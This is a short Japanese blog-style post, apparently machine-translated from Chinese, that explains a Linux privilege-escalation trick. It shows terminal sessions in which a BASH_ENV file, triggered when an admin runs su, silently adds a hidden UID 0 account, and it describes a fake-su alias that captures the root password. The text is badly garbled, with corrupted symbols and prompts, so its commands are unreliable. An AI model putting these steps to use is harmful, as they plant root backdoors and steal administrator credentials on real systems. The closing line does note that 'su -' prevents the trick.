linux提権用のテクニック


作者:xi 4 oyu一个test:[xiaoyu@localdomain~』$echo$BASH_ENV[xiaoyu@localdomain~』$export BASH_ENV=「/tmp/.bashrc」[xiaoyu@localdomain~』$echo$BASH_ENV/tmp/.bashrc[xiaoyu@localdomain~』$cat/tmp/.bashrcu〓!/bin/bash echo「ハロー」xiaoyu@localdomain~)$ls-l-rwxr-x 1 xiaoyu 22 2008-09-11 05:54 test.sh[xiaoyu@localdomain~~』$cat test.sh𞃳!/bin/bash echo「kk」xiaoyu@localdomainはい、期待通りです。どうやって利用しますか?grepス~/.bash_historyはこのユーザーがスを使ってrootアカウントにログインするという特殊な癖があると示しています。以前私達はこのような状況に遭遇しました。通常はfakes.cを詰めて入るのです。そして修正しますprofileは、別名を作るというものです。getpassでrootパスワードを取得して記録し、別名を削除します。鍵は管理人が正しいパスワードでログインする時もパスワードの間違いを提示することです。バカな管理人に会ったら、この詳細を見逃して、もう一度パスワードを入力すればいいです。しかし、いくつかの非人間的なadminは、システムの侵入の兆しを確認するために最速の速度で、何が追加されますか?盗んだパスワードも役に立たないです。うん、聡明なX客たちはきっと私が何をしたいのかを知っています。ふふ、まず環境変数を見てからではないです。xiaoyu@localdomain~』$echo$BASH_ENV/tmp/.bashrc[xiaoyu@localdomain~』$スPassword:[root@localdomainxiaoyu玣echo$BASH_ENV/tmp/.bashrcよ、まだ、OK、実験終了、実戦:xiaoyu@localdomaintmp]$echo'/usr/sbin/useradd-u 0-o kk 2'/dev/null'//tmp/bashrc[xiaoyu@localdomaintmp]$cat/tmp/bashrc/usr/sbin/useradd-u 0-o ck 2'/dev/null[xiaoyu@localdomaintmp]$grep kk/etc/passwd[xiaoyu@localdomaintmp;$echo$BASH_ENV/tmp/.bashrc[xiaoyu@localdomaintmp;$スPassword:[root@localdomaintmp;菗cd/home/xiaoyu[root@localdomainxiaoyu./test.shkk[root@localdomainxiaoyu菗grep kk/etc/passwd kk:x:0:503::/home/kk:/bin/bash[root@localdomainxiaoyu"((zhiほほほ、パスワードを変える文は入れていません。自分で考えて、ほほほ、分かりませんでした。うん、どうやって配置するかについては、fakesと同じです。profileなどでexport BASHENV変数…このような状況を避けるにはス-ロトを使って、この指令を覚えている管理人はあまりいないでしょう。汗…これからは少しずつテクニックを出して、多くのものが巣にこもって、自分でも忘れてしまいます。